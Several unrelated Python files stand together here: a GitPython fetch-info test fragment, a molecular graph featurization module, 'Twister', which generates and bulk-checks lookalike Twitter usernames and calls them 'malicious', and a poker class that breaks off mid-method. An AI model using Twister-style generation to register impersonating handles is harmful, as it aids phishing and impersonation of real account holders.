                                     remote_info_line_fmt % "local/master",
                                     fetch_info_line_fmt % 'remote-tracking branch')

        # we wouldn't be here if it wouldn't have worked

        # handles non-default refspecs: One can specify a different path in refs/remotes
        # or a special path just in refs/something for instance

        fi = CmdFetchInfo._from_line(self.rorepo,
                                     remote_info_line_fmt % "subdir/tagname",
                                     fetch_info_line_fmt % 'tag')

        assert isinstance(fi.ref, TagReference)
        assert fi.ref.path.startswith('refs/tags')

        # it could be in a remote direcftory though
        fi = CmdFetchInfo._from_line(self.rorepo,
                                     remote_info_line_fmt % "remotename/tags/tagname",
                                     fetch_info_line_fmt % 'tag')

        assert isinstance(fi.ref, TagReference)
        assert fi.ref.path.startswith('refs/remotes/')

        # it can also be anywhere !
        tag_path = "refs/something/remotename/tags/tagname"
        fi = CmdFetchInfo._from_line(self.rorepo,
                                     remote_info_line_fmt % tag_path,
                                     fetch_info_line_fmt % 'tag')

        assert isinstance(fi.ref, TagReference)
        assert fi.ref.path == tag_path

        # branches default to refs/remotes
        fi = CmdFetchInfo._from_line(self.rorepo,
                                     remote_info_line_fmt % "remotename/branch",
                                     fetch_info_line_fmt % 'branch')

        assert isinstance(fi.ref, RemoteReference)
        assert fi.ref.remote_name == 'remotename'

        # but you can force it anywhere, in which case we only have a references
        fi = CmdFetchInfo._from_line(self.rorepo,
                                     remote_info_line_fmt % "refs/something/branch",
                                     fetch_info_line_fmt % 'branch')

        assert type(fi.ref) is Reference
        assert fi.ref.path == "refs/something/branch"
|
import torch
from rdkit import Chem
import networkx as nx
from seq_graph_retro.molgraph.mol_features import get_atom_features, get_bond_features
from seq_graph_retro.molgraph.mol_features import BOND_FDIM, ATOM_FDIM, BOND_TYPES
from seq_graph_retro.utils.torch import create_pad_tensor
from typing import Any, List, Dict, Tuple
def prepare_lg_labels(lg_dict: Dict, lg_data: List) -> Tuple[torch.Tensor, List[int]]:
    """Prepare leaving group label tensors.

    Every leaving group is mapped to its index (unknown groups fall back
    to the ``<unk>`` index) and each row is right-padded with the
    ``<pad>`` index up to the longest sequence in the batch.

    BUG FIX: the return annotation previously claimed ``torch.Tensor``
    although the function returns a (labels, lengths) tuple.

    Parameters
    ----------
    lg_dict: Dict
        Dictionary containing leaving groups to indices map; must contain
        the special tokens ``<pad>`` and ``<unk>``
    lg_data: List
        List of lists containing the leaving groups

    Returns
    -------
    labels: torch.Tensor of shape (batch, max_len) and dtype long
    lengths: List[int]
        Unpadded length of each row
    """
    pad_idx, unk_idx = lg_dict["<pad>"], lg_dict["<unk>"]
    lg_labels = [[lg_dict.get(lg_group, unk_idx) for lg_group in labels] for labels in lg_data]
    lengths = [len(lg) for lg in lg_labels]

    labels = torch.full(size=(len(lg_labels), max(lengths)), fill_value=pad_idx, dtype=torch.long)
    for i, lgs in enumerate(lg_labels):
        labels[i, :len(lgs)] = torch.tensor(lgs)
    return labels, lengths
def pack_graph_feats(graph_batch: List[Any], directed: bool, use_rxn_class: bool = False,
                     return_graphs: bool = False) -> Tuple[torch.Tensor, List[Tuple[int]]]:
    """Prepare graph tensors.
    Parameters
    ----------
    graph_batch: List[Any],
        Batch of graph objects. Should have attributes G_dir, G_undir
    directed: bool,
        Whether to prepare tensors for directed message passing
    use_rxn_class: bool, default False,
        Whether to use reaction class as additional input
    return_graphs: bool, default False,
        Whether to return the graphs

    Returns
    -------
    (graph_tensors, scopes) and, when return_graphs is True, additionally the
    union of the relabelled networkx graphs. graph_tensors is
    (node feats, message/bond feats, agraph, bgraph, atoms_in_bonds).
    Index 0 of every tensor is a sentinel (dummy atom "*" / zero bond), so all
    real node, bond and message indices are 1-based.
    """
    if directed:
        # Sentinel entries at index 0 so that 0 can act as padding.
        fnode = [get_atom_features(Chem.Atom("*"), use_rxn_class=use_rxn_class, rxn_class=0)]
        fmess = [[0,0] + [0] * BOND_FDIM]
        agraph, bgraph = [[]], [[]]
        atoms_in_bonds = [[]]
        atom_scope, bond_scope = [], []
        edge_dict = {}
        all_G = []
        for bid, graph in enumerate(graph_batch):
            mol = graph.mol
            assert mol.GetNumAtoms() == len(graph.G_dir)
            # Offsets shift this molecule's atom/bond indices into the
            # batch-wide index space.
            atom_offset = len(fnode)
            bond_offset = len(atoms_in_bonds)
            bond_to_tuple = {bond.GetIdx(): tuple(sorted((bond.GetBeginAtomIdx(), bond.GetEndAtomIdx())))
                            for bond in mol.GetBonds()}
            tuple_to_bond = {val: key for key, val in bond_to_tuple.items()}
            atom_scope.append(graph.update_atom_scope(atom_offset))
            bond_scope.append(graph.update_bond_scope(bond_offset))
            # Relabel nodes so they are unique across the whole batch.
            G = nx.convert_node_labels_to_integers(graph.G_dir, first_label=atom_offset)
            all_G.append(G)
            fnode.extend( [None for v in G.nodes] )
            for v, attr in G.nodes(data='label'):
                G.nodes[v]['batch_id'] = bid
                fnode[v] = get_atom_features(mol.GetAtomWithIdx(v-atom_offset),
                                             use_rxn_class=use_rxn_class,
                                             rxn_class=graph.rxn_class)
                agraph.append([])
            # One slot per RDKit bond; filled with the first direction seen.
            bond_comp = [None for _ in range(mol.GetNumBonds())]
            for u, v, attr in G.edges(data='label'):
                bond_feat = get_bond_features(mol.GetBondBetweenAtoms(u-atom_offset, v-atom_offset)).tolist()
                bond = sorted([u, v])
                mess_vec = [u, v] + bond_feat
                if [v, u] not in bond_comp:
                    # Record each undirected bond once, keyed by its RDKit index.
                    idx_to_add = tuple_to_bond[(u-atom_offset, v-atom_offset)]
                    bond_comp[idx_to_add] = [u, v]
                fmess.append(mess_vec)
                # Message ids start at 1; 0 is the sentinel message.
                edge_dict[(u, v)] = eid = len(edge_dict) + 1
                G[u][v]['mess_idx'] = eid
                agraph[v].append(eid)
                bgraph.append([])
            atoms_in_bonds.extend(bond_comp)
            # bgraph[eid] lists incoming messages to u, excluding the reverse edge.
            for u, v in G.edges:
                eid = edge_dict[(u, v)]
                for w in G.predecessors(u):
                    if w == v: continue
                    bgraph[eid].append( edge_dict[(w, u)] )
        fnode = torch.tensor(fnode, dtype=torch.float)
        fmess = torch.tensor(fmess, dtype=torch.float)
        atoms_in_bonds = create_pad_tensor(atoms_in_bonds).long()
        agraph = create_pad_tensor(agraph)
        bgraph = create_pad_tensor(bgraph)
        graph_tensors = (fnode, fmess, agraph, bgraph, atoms_in_bonds)
        scopes = (atom_scope, bond_scope)
        if return_graphs:
            return graph_tensors, scopes, nx.union_all(all_G)
        else:
            return graph_tensors, scopes
    else:
        # Undirected variant: separate atom/bond feature lists; adjacency is
        # expressed atom-to-atom (agraph) and atom-to-bond (bgraph).
        afeat = [get_atom_features(Chem.Atom("*"), use_rxn_class=use_rxn_class, rxn_class=0)]
        bfeat = [[0] * BOND_FDIM]
        atoms_in_bonds = [[]]
        agraph, bgraph = [[]], [[]]
        atom_scope = []
        bond_scope = []
        edge_dict = {}
        all_G = []
        for bid, graph in enumerate(graph_batch):
            mol = graph.mol
            assert mol.GetNumAtoms() == len(graph.G_undir)
            atom_offset = len(afeat)
            bond_offset = len(bfeat)
            atom_scope.append(graph.update_atom_scope(atom_offset))
            bond_scope.append(graph.update_bond_scope(bond_offset))
            G = nx.convert_node_labels_to_integers(graph.G_undir, first_label=atom_offset)
            all_G.append(G)
            afeat.extend( [None for v in G.nodes] )
            for v, attr in G.nodes(data='label'):
                G.nodes[v]['batch_id'] = bid
                afeat[v] = get_atom_features(mol.GetAtomWithIdx(v-atom_offset),
                                             use_rxn_class=use_rxn_class,
                                             rxn_class=graph.rxn_class)
                agraph.append([])
                bgraph.append([])
            for u, v, attr in G.edges(data='label'):
                bond_feat = get_bond_features(mol.GetBondBetweenAtoms(u-atom_offset, v-atom_offset)).tolist()
                bfeat.append(bond_feat)
                atoms_in_bonds.append([u, v])
                edge_dict[(u, v)] = eid = len(edge_dict) + 1
                G[u][v]['mess_idx'] = eid
                # Each undirected edge is registered in both endpoint lists.
                agraph[v].append(u)
                agraph[u].append(v)
                bgraph[u].append(eid)
                bgraph[v].append(eid)
        afeat = torch.tensor(afeat, dtype=torch.float)
        bfeat = torch.tensor(bfeat, dtype=torch.float)
        atoms_in_bonds = create_pad_tensor(atoms_in_bonds).long()
        agraph = create_pad_tensor(agraph)
        bgraph = create_pad_tensor(bgraph)
        graph_tensors = (afeat, bfeat, agraph, bgraph, atoms_in_bonds)
        scopes = (atom_scope, bond_scope)
        if return_graphs:
            return graph_tensors, scopes, nx.union_all(all_G)
        else:
            return graph_tensors, scopes
def tensorize_bond_graphs(graph_batch, directed: bool, use_rxn_class: bool = False,
                          return_graphs: bool = False):
    """Prepare message-passing tensors over the bond (line) graph.

    Parameters
    ----------
    graph_batch: List[Any]
        Batch of graph objects; each must expose ``mol``, ``G_undir`` and
        ``rxn_class``.
    directed: bool
        Whether to prepare tensors for directed message passing. Only the
        directed branch is implemented; with ``directed=False`` the function
        returns None (NOTE(review): confirm callers never pass False).
    use_rxn_class: bool, default False
        Whether to use reaction class as additional input. (Bug fix: the
        signature previously read ``use_rxn_class: False`` — the literal
        ``False`` as an annotation with no default, making the argument
        required and untyped. Now a proper boolean keyword with default.)
    return_graphs: bool, default False
        Accepted for signature parity with pack_graph_feats; unused here.

    Returns
    -------
    (graph_tensors, scope) where graph_tensors is
    (bond feats, message feats, agraph, bgraph, None) and scope holds
    (offset, num_bonds) per molecule. Indices are 1-based (index 0 sentinel).
    """
    if directed:
        edge_dict = {}
        # Sentinel rows at index 0 (sizes mirror the feature construction below).
        fnode = [[0] * BOND_FDIM]
        if use_rxn_class:
            fmess = [[0, 0] + [0] * (ATOM_FDIM + 10) + [0] + [0] * 2 * (BOND_FDIM - 1)]
        else:
            fmess = [[0, 0] + [0] * ATOM_FDIM + [0] + [0] * 2 * (BOND_FDIM - 1)]
        agraph, bgraph = [[]], [[]]
        scope = []
        for bid, graph in enumerate(graph_batch):
            mol = graph.mol
            assert mol.GetNumAtoms() == len(graph.G_undir)
            offset = len(fnode)
            # Line graph: nodes are bonds (atom-index pairs), edges join bonds
            # that share an atom.
            bond_graph = nx.line_graph(graph.G_undir)
            bond_graph = nx.to_directed(bond_graph)
            fnode.extend([None for v in bond_graph.nodes])
            scope.append((offset, mol.GetNumBonds()))
            ri = mol.GetRingInfo()
            bond_rings = ri.BondRings()
            bond_to_tuple = {bond.GetIdx(): tuple(sorted((bond.GetBeginAtomIdx(), bond.GetEndAtomIdx())))
                             for bond in mol.GetBonds()}
            tuple_to_bond = {val: key for key, val in bond_to_tuple.items()}
            for u in bond_graph.nodes():
                agraph.append([])
                atom_idx_a, atom_idx_b = u
                bond_idx = tuple_to_bond[u] + offset
                fnode[bond_idx] = get_bond_features(mol.GetBondBetweenAtoms(atom_idx_a, atom_idx_b)).tolist()
            for u, v in bond_graph.edges():
                edge_dict[(u, v)] = eid = len(edge_dict) + 1
                bond_idx_u = tuple_to_bond[tuple(sorted(u))] + offset
                bond_idx_v = tuple_to_bond[tuple(sorted(v))] + offset
                common_atom_idx = set(u).intersection(set(v))
                # Flag whether the two bonds sit in the same ring.
                incommon_ring = 0
                for ring in bond_rings:
                    if (bond_idx_u-offset) in ring and (bond_idx_v-offset) in ring:
                        incommon_ring = 1
                        break
                # Edge features: shared-atom features, ring flag, the (sorted)
                # bond types of both bonds, and their conjugation flags.
                common_atom = mol.GetAtomWithIdx(list(common_atom_idx)[0])
                edge_feats = get_atom_features(common_atom,
                                               use_rxn_class=use_rxn_class,
                                               rxn_class=graph.rxn_class) + [incommon_ring]
                atom_idx_a, atom_idx_b = u
                atom_idx_c, atom_idx_d = v
                bond_u = mol.GetBondBetweenAtoms(atom_idx_a, atom_idx_b)
                bond_v = mol.GetBondBetweenAtoms(atom_idx_c, atom_idx_d)
                bt_u, bt_v = bond_u.GetBondType(), bond_v.GetBondType()
                conj_u, conj_v = bond_u.GetIsConjugated(), bond_v.GetIsConjugated()
                sorted_u, sorted_v = sorted([bt_u, bt_v])
                feats_u = [float(sorted_u == bond_type) for bond_type in BOND_TYPES[1:]]
                feats_v = [float(sorted_v == bond_type) for bond_type in BOND_TYPES[1:]]
                edge_feats.extend(feats_u)
                edge_feats.extend(feats_v)
                edge_feats.extend(sorted([conj_u, conj_v]))
                mess_vec = [bond_idx_u, bond_idx_v] + edge_feats
                fmess.append(mess_vec)
                agraph[bond_idx_v].append(eid)
                bgraph.append([])
            # Incoming messages per edge, excluding the reverse direction.
            for u, v in bond_graph.edges():
                eid = edge_dict[(u, v)]
                for w in bond_graph.predecessors(u):
                    if w == v: continue
                    bgraph[eid].append(edge_dict[(w, u)])
        fnode = torch.tensor(fnode, dtype=torch.float)
        fmess = torch.tensor(fmess, dtype=torch.float)
        agraph = create_pad_tensor(agraph)
        bgraph = create_pad_tensor(bgraph)
        graph_tensors = (fnode, fmess, agraph, bgraph, None)
        return graph_tensors, scope
|
<reponame>mh0x/twister
#!/usr/bin/env python3
# Twister v0.9
# https://github.com/mh0x/twister
import argparse
import collections
import concurrent.futures
import copy
import itertools
import json
import os
import re
import requests
import sys
__version__ = '0.9'
__author__ = 'https://github.com/mh0x'
script_name = 'Twister v' + __version__ + ' (' + __author__ + '/twister)'
script_desc = '''
Permutation engine for generating and checking the availability of malicious
Twitter usernames. Several edit operations are supported: substitution,
transposition, insertion, deletion, and prefix/suffix.
'''
script_usage = '''twister.py [-h] [-c] [-q] [-o OUTPUT] [-n THREADS]
[-r RETRIES] [-t TIMEOUT] profile user [user ...]'''
script_epilog = '''
edit operations: notation:
{"sub": {x: [y, ...], ...}, "max": n} x, y characters
{"tra": [[x, y], ...], "max": n} u strings
{"ins": {x: [y, ...], ...}, "max": n} n positive integers
{"del": [x, ...], "max": n}
{"pre": [u, ...]}
{"suf": [u, ...]}'''
# Tunable defaults for the -n / -r / -t CLI flags.
default_threads = 5
default_retries = 2
default_timeout = 10
# Twitter usernames may only contain word characters (a-z, A-Z, 0-9, _).
valid_chars = re.compile('^[a-zA-Z0-9_]+$')
# Availability-check endpoint; responds with JSON containing a 'valid' field.
endpoint_url = 'https://twitter.com/users/username_available?username='
def error(err):
    """Write an error message to stderr."""
    message = '[!] error: ' + str(err)
    print(message, file=sys.stderr)
def info(msg, quiet=False):
    """Print an informational message unless quiet mode is on."""
    if quiet:
        return
    print('[*] ' + msg)
def success(msg, quiet=False):
    """Print a success message unless quiet mode is on."""
    if quiet:
        return
    print('[+] ' + msg)
def failure(msg, quiet=False):
    """Print a failure message unless quiet mode is on."""
    if quiet:
        return
    print('[-] ' + msg)
def prologue(quiet=False):
    """Print the script banner unless quiet mode is enabled."""
    if quiet:
        return
    print(script_name)
def unique(elems):
    """Return elems with duplicates removed, preserving first-seen order."""
    seen = collections.OrderedDict()
    for elem in elems:
        seen.setdefault(elem, None)
    return list(seen)
class EditOp:
    """Base class for username edit operations.

    Subclasses provide edits() (candidate edit sites for a string) and
    generate() (usernames produced by applying a chosen set of sites).
    """
    def __init__(self, cases, max=1):
        # `cases` is the operation's edit table; `max` bounds how many edits
        # may be combined in one generated username.
        self.cases = cases
        self.max = max

    def apply(self, string):
        """Return all strings reachable with 1..max simultaneous edits."""
        results = []
        candidates = self.edits(string)
        for size in range(1, self.max + 1):
            for combo in itertools.combinations(candidates, size):
                results.extend(self.generate(string, list(combo)))
        return results
class SubOp(EditOp):
    """Substitution: replace characters according to a lookup table."""
    def generate(self, string, edit):
        out = []
        positions = [site[0] for site in edit]
        for replacement in itertools.product(*[site[1] for site in edit]):
            chars = list(string)
            for pos, new_char in zip(positions, replacement):
                chars[pos] = new_char
            out.append(''.join(chars))
        return out

    def edits(self, string):
        """Return (index, substitutes) pairs for every replaceable char."""
        sites = []
        for i, char in enumerate(string):
            if char in self.cases:
                sites.append((i, self.cases[char]))
        return sites
class TraOp(EditOp):
    """Transposition: swap adjacent character pairs listed in `cases`."""
    def generate(self, string, edit):
        chars = list(string)
        for pos in edit:
            chars[pos], chars[pos + 1] = chars[pos + 1], chars[pos]
        return [''.join(chars)]

    def edits(self, string):
        """Indices i where [string[i], string[i+1]] is a listed pair."""
        sites = []
        for i in range(len(string) - 1):
            if [string[i], string[i + 1]] in self.cases:
                sites.append(i)
        return sites
class InsOp(EditOp):
    """Insertion: append table characters after matching positions,
    discarding any result longer than Twitter's 15-character limit."""
    def generate(self, string, edit):
        out = []
        positions = [site[0] for site in edit]
        for insertion in itertools.product(*[site[1] for site in edit]):
            chars = list(string)
            for pos, extra in zip(positions, insertion):
                chars[pos] = chars[pos] + extra
            candidate = ''.join(chars)
            if len(candidate) <= 15:
                out.append(candidate)
        return out

    def edits(self, string):
        """Return (index, insertions) pairs for every matching char."""
        sites = []
        for i, char in enumerate(string):
            if char in self.cases:
                sites.append((i, self.cases[char]))
        return sites
class DelOp(EditOp):
    """Deletion: drop listed characters; never yields an empty username."""
    def generate(self, string, edit):
        kept = [char for i, char in enumerate(string) if i not in edit]
        if not kept:
            return []
        return [''.join(kept)]

    def edits(self, string):
        sites = []
        for i, char in enumerate(string):
            if char in self.cases:
                sites.append(i)
        return sites
class PreOp(EditOp):
    """Prefix: prepend each configured string, respecting the 15-char cap."""
    def apply(self, string):
        return [prefix + string for prefix in self.cases
                if len(prefix + string) <= 15]
class SufOp(EditOp):
    """Suffix: append each configured string, respecting the 15-char cap."""
    def apply(self, string):
        return [string + suffix for suffix in self.cases
                if len(string + suffix) <= 15]
class ArgParser(argparse.ArgumentParser):
    """ArgumentParser with a banner-first help layout and exception-based errors."""
    def format_help(self):
        # Rebuild the help text manually so the script banner appears before
        # the description/usage. NOTE(review): relies on private argparse
        # attributes (_get_formatter, _action_groups, ...) — may break across
        # Python versions.
        formatter = self._get_formatter()
        formatter.add_text(script_name)
        formatter.add_text(self.description)
        formatter.add_usage(self.usage, self._actions,
                            self._mutually_exclusive_groups)
        for action_group in self._action_groups:
            formatter.start_section(action_group.title)
            formatter.add_text(action_group.description)
            formatter.add_arguments(action_group._group_actions)
            formatter.end_section()
        formatter.add_text(self.epilog)
        return formatter.format_help()
    def error(self, msg):
        # Raise instead of exiting so parse_args() can report the error in
        # the script's uniform style (banner + '[!] error: ...').
        raise argparse.ArgumentTypeError(msg.replace('\'', '') + os.linesep*2 +
                                         self.format_usage().rstrip())
def help_formatter(prog):
    """Formatter factory: raw text with a wider column for help strings."""
    formatter = argparse.RawTextHelpFormatter(prog, max_help_position=40)
    return formatter
def arg_default(default):
    """Render the '(default: X)' suffix used in option help strings."""
    return f'(default: {default!s})'
def arg_error(obj, desc, msg=''):
    """Raise an ArgumentTypeError describing an invalid argument value."""
    detail = ' (' + msg + ')' if msg else ''
    rendered = str(obj).replace('\'', '"')
    raise argparse.ArgumentTypeError('invalid ' + desc + ': ' + rendered + detail)
def check_type(obj, typ, desc, msg=''):
    """Fail with an argument error unless obj is an instance of typ."""
    if isinstance(obj, typ):
        return
    arg_error(obj, desc, msg)
def check_list(obj, desc):
    """Ensure obj is a JSON array (Python list); raises via arg_error otherwise."""
    check_type(obj, list, desc, 'expected an array')
def check_dict(obj, desc):
    """Ensure obj is a JSON object (Python dict); raises via arg_error otherwise."""
    check_type(obj, dict, desc, 'expected an object')
def parse_str(obj, desc, min=1, max=15):
    """Validate a profile/username string and return it lowercased.

    Enforces length bounds [min, max] and Twitter's allowed character set.
    (`min`/`max` shadow builtins but are kept — they are part of the
    keyword interface used by callers.)

    Raises argparse.ArgumentTypeError (via arg_error) on any violation.
    """
    check_type(obj, str, desc, 'expected a string')
    if min == max and len(obj) != min:
        # Bug fix: pluralize 'char' correctly — previously rendered
        # 'expected 1 chars' / 'expected 2 charss'.
        arg_error(obj, desc, 'expected ' + str(min) + ' char'
                  + ('' if min == 1 else 's'))
    if len(obj) < min:
        arg_error(obj, desc, 'min length is ' + str(min))
    if len(obj) > max:
        arg_error(obj, desc, 'max length is ' + str(max))
    if not valid_chars.match(obj):
        arg_error(obj, desc, 'valid chars: a-z, A-Z, 0-9, _')
    return obj.lower()
def parse_str_set(obj, desc, min=1, max=15):
    """Parse a JSON array of strings, validating each and dropping duplicates."""
    check_list(obj, desc + ' set')
    parsed = [parse_str(element, desc, min, max) for element in obj]
    return unique(parsed)
def parse_char(obj):
    """Parse a single character (a length-1 string)."""
    return parse_str(obj, 'char', max=1)
def parse_char_set(obj):
    """Parse a JSON array of single characters, de-duplicated."""
    return parse_str_set(obj, 'char', max=1)
def parse_int(obj):
    """Parse an integer, raising an argument error if malformed."""
    try:
        return int(obj)
    except ValueError:
        # arg_error always raises, so no value escapes this branch.
        arg_error(obj, 'int value')
def parse_nneg_int(obj):
    """Parse an integer and require it to be >= 0."""
    num = parse_int(obj)
    if num >= 0:
        return num
    arg_error(num, 'int value', 'must be non-negative')
def parse_pos_int(obj):
    """Parse an integer and require it to be >= 1."""
    num = parse_int(obj)
    if num >= 1:
        return num
    arg_error(num, 'int value', 'must be positive')
def parse_op(obj, key, max=True):
    """Extract an operation's own property (and 'max', when required) from obj.

    Rejects any unknown property; values are shallow-copied so later
    validation cannot mutate the caller's object.
    """
    op = {}
    allowed = {key, 'max'} if max else {key}
    for prop, value in obj.items():
        if prop not in allowed:
            arg_error(prop, 'operation property')
        op[prop] = copy.copy(value)
    if max and 'max' not in op:
        arg_error(obj, 'operation', 'missing max property')
    return op
def parse_sub_op(obj):
    """Build a SubOp from a {"sub": {char: [chars]}, "max": n} object.

    Self-substitutions and chars with no remaining alternatives are dropped.
    """
    op = parse_op(obj, 'sub')
    check_dict(op['sub'], 'operation property')
    subs = {}
    for key, values in op['sub'].items():
        char = parse_char(key)
        alternatives = [c for c in parse_char_set(values) if c != char]
        if alternatives:
            subs[char] = alternatives
    return SubOp(subs, parse_pos_int(op['max']))
def parse_tra_op(obj):
    """Build a TraOp from a {"tra": [[x, y], ...], "max": n} object.

    Each entry must be exactly two distinct characters; duplicate pairs
    are ignored. (Bug fix: error message previously misspelled
    'charaters'.)
    """
    op = parse_op(obj, 'tra')
    check_list(op['tra'], 'operation property')
    tras = []
    for obj in op['tra']:
        chars = parse_char_set(obj)
        if len(chars) != 2:
            arg_error(chars, 'operation property', 'expected two characters')
        if chars not in tras:
            tras.append(chars)
    return TraOp(tras, parse_pos_int(op['max']))
def parse_ins_op(obj):
    """Build an InsOp from a {"ins": {char: [chars]}, "max": n} object."""
    op = parse_op(obj, 'ins')
    check_dict(op['ins'], 'operation property')
    table = {}
    for key, values in op['ins'].items():
        table[parse_char(key)] = parse_char_set(values)
    return InsOp(table, parse_pos_int(op['max']))
def parse_del_op(obj):
    """Build a DelOp from a {"del": [chars], "max": n} object.

    Consistency fix: read the character set from the validated/copied `op`
    dict (as every other operation parser does) rather than the raw input
    `obj`; the values are equal, but using `op` keeps the parsers uniform.
    """
    op = parse_op(obj, 'del')
    return DelOp(parse_char_set(op['del']), parse_pos_int(op['max']))
def parse_pre_op(obj):
    """Build a PreOp from a {"pre": [strings]} object (no 'max' property)."""
    return PreOp(parse_str_set(
        parse_op(obj, 'pre', False)['pre'], 'prefix', max=14))
def parse_suf_op(obj):
    """Build a SufOp from a {"suf": [strings]} object (no 'max' property)."""
    return SufOp(parse_str_set(
        parse_op(obj, 'suf', False)['suf'], 'suffix', max=14))
# Dispatch table: profile property name -> parser that builds the EditOp.
op_parsers = {'sub': parse_sub_op, 'tra': parse_tra_op,
              'ins': parse_ins_op, 'del': parse_del_op,
              'pre': parse_pre_op, 'suf': parse_suf_op}
def parse_profile(string):
    """Load a generator profile from a file path or an inline JSON string.

    Returns the list of EditOp instances in profile order; every entry must
    name exactly one known operation.
    """
    try:
        if os.path.isfile(string):
            with open(string, 'r') as fp:
                obj = json.load(fp)
        else:
            obj = json.loads(string)
    except (IOError, json.JSONDecodeError) as err:
        raise argparse.ArgumentTypeError(str(err))
    check_list(obj, 'profile')
    profile = []
    for entry in obj:
        check_dict(entry, 'operation')
        keys = [k for k in entry if k in op_parsers]
        if len(keys) == 1:
            profile.append(op_parsers[keys[0]](entry))
        elif keys:
            arg_error(entry, 'operation', 'ambiguous properties')
        else:
            arg_error(entry, 'operation')
    return profile
def parse_user(string):
    """Normalize a target username argument, dropping one leading '@'."""
    handle = string
    if handle.startswith('@'):
        handle = handle[1:]
    return parse_str(handle, 'username')
def parse_args():
    """Parse CLI arguments.

    On invalid input, ArgParser raises ArgumentTypeError instead of exiting;
    this handler prints the banner plus the error and exits with status 1.
    """
    parser = ArgParser(description=script_desc, usage=script_usage,
                       epilog=script_epilog, formatter_class=help_formatter)
    parser.add_argument('profile', type=parse_profile,
                        help='generator profile json')
    parser.add_argument('user', type=parse_user, nargs='+',
                        help='target username(s)')
    parser.add_argument('-c', '--check', action='store_true',
                        help='check availability of generated usernames')
    parser.add_argument('-q', '--quiet', action='store_true',
                        help='suppress messages sent to stdout')
    parser.add_argument('-o', '--output', type=argparse.FileType('w'),
                        help='output results to csv file')
    parser.add_argument('-n', '--threads', type=parse_pos_int,
                        default=default_threads,
                        help=('max concurrent requests '
                              + arg_default(default_threads)))
    parser.add_argument('-r', '--retries', type=parse_nneg_int,
                        default=default_retries,
                        help=('max request retries '
                              + arg_default(default_retries)))
    parser.add_argument('-t', '--timeout', type=parse_pos_int,
                        default=default_timeout,
                        help=('request timeout, secs '
                              + arg_default(default_timeout)))
    try:
        args = parser.parse_args()
        # De-duplicate target usernames while preserving order.
        args.user = unique(args.user)
        return args
    except argparse.ArgumentTypeError as err:
        prologue()
        print()
        error(err)
        sys.exit(1)
def generate_users(target, profile, quiet=False):
    """Generate username permutations of `target`, one profile op at a time.

    Each operation is applied to every username produced so far (including
    the target), so edits accumulate across operations. The target itself is
    excluded from the returned list.

    Performance fix: the original rebuilt ``set(users + temp)`` for every
    candidate, making generation quadratic; a single incrementally-updated
    seen-set yields identical results in linear time.
    """
    users = [target]
    seen = {target}
    for op in profile:
        temp = []
        for user in users:
            for candidate in op.apply(user):
                if candidate not in seen:
                    seen.add(candidate)
                    temp.append(candidate)
                    success(candidate, quiet)
        users.extend(temp)
    users.remove(target)
    return users
def generate_all(targets, profile, quiet=False):
    """Generate permutations for every target and report the total count."""
    info('generating usernames ...', quiet)
    users = []
    for target in targets:
        users.extend(generate_users(target, profile, quiet))
    total = len(users)
    plural = '' if total == 1 else 's'
    info('generated ' + str(total) + ' username' + plural, quiet)
    return users
def user_available(user, session, timeout=default_timeout, quiet=False):
    """Query Twitter's availability endpoint for one username.

    Returns the endpoint's 'valid' value (truthy = available), or None when
    the request fails or the response is malformed.
    """
    try:
        resp = session.get(endpoint_url + user, timeout=timeout).json()
    except (requests.exceptions.RequestException, json.JSONDecodeError) as err:
        error(err)
        return None
    if 'valid' in resp:
        return resp['valid']
    error('malformed response: ' + str(resp))
def check_available(users, threads=default_threads, retries=default_retries,
                    timeout=default_timeout, quiet=False):
    """Check username availability concurrently.

    Returns CSV-style rows 'name,code' where code is 1 = available,
    0 = unavailable, -1 = the check errored. Ctrl-C stops early and
    cancels any not-yet-started checks.
    """
    info('checking availability ...', quiet)
    hits = 0
    errs = 0
    checked = 0
    results = []
    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as pool:
        with requests.session() as session:
            # Mount an adapter so transient HTTP failures are retried.
            session.mount('https://twitter.com',
                          requests.adapters.HTTPAdapter(max_retries=retries))
            futures = {pool.submit(user_available, user, session,
                                   timeout, quiet): user for user in users}
            try:
                for future in concurrent.futures.as_completed(futures):
                    user = futures[future]
                    available = future.result()
                    if available:
                        hits += 1
                        success(user + ' is available', quiet)
                        results.append(user + ',1')
                    elif available is not None:
                        failure(user + ' is unavailable', quiet)
                        results.append(user + ',0')
                    else:
                        # user_available returned None -> request/parse error.
                        errs += 1
                        results.append(user + ',-1')
                    checked += 1
            except KeyboardInterrupt:
                print(' stopping ...')
                for future in futures:
                    future.cancel()
    total = len(users)
    msg = (str(hits) + ' out of ' + str(total) + ' username'
           + (' is' if total == 1 else 's are') + ' available')
    # Qualify the summary when interrupted early or when errors occurred.
    caveat = []
    if checked != total:
        caveat.append('stopped after ' + str(checked) + ' check'
                      + ('' if checked == 1 else 's'))
    if errs:
        caveat.append('with ' + str(errs) + ' error'
                      + ('' if errs == 1 else 's'))
    info(msg + (' (' + ' '.join(caveat) + ')' if caveat else ''), quiet)
    return results
def write_csv(lines, outfile, quiet=False):
    """Write the result rows to the output file, one per line.

    (Bug fix: status message previously misspelled 'outputing'.)
    """
    info('outputting results ...', quiet)
    outfile.write(os.linesep.join(lines))
def main():
    """CLI entry point: parse args, generate, optionally check and export."""
    args = parse_args()
    prologue(args.quiet)
    users = generate_all(args.user, args.profile, args.quiet)
    if args.check and len(users) > 0:
        # After checking, `users` holds CSV rows ('name,1|0|-1'),
        # not bare usernames.
        users = check_available(users, args.threads, args.retries,
                                args.timeout, args.quiet)
    if args.output:
        write_csv(users, args.output, args.quiet)
        args.output.close()
    info('done', args.quiet)
# Standard script entry guard.
if __name__ == '__main__':
    main()
|
from itertools import combinations as combinations
from operator import attrgetter
import Player as P
###
class PokerPool(P.Player):
    '''Derived class for pool of common cards'''
    # A pool holds at most five community cards.
    max_cards = 5
    def __init__(self, name):
        P.Player.__init__(self, name)
        # Cap the underlying Hand at the pool's maximum.
        self.hand.max_cards = self.max_cards
###
class PokerHand():
    '''Class for finding best hand with pool'''
    # Poker hands are always evaluated five cards at a time.
    max_cards = 5
    #_____________________________
    def __init__(self, hand, pool):
        # `hand` and `pool` are player-like objects exposing `.cards`.
        self.hand = hand.cards
        self.pool = pool.cards
        # 0 = nothing evaluated yet; real scores from Poker start at 1.
        self.score = 0
    #_____________________________
    def is_tie(self, score, rank_cards, kicker_cards):
        '''
        Returns true if score is same, rank cards are identical,
        and kicker cards are identical
        '''
        # NOTE(review): self.rank_cards / self.kicker_cards exist only after
        # update_hand() has run at least once — call get_score() first.
        if score != self.score:
            return False
        if rank_cards != self.rank_cards:
            return False
        if kicker_cards != self.kicker_cards:
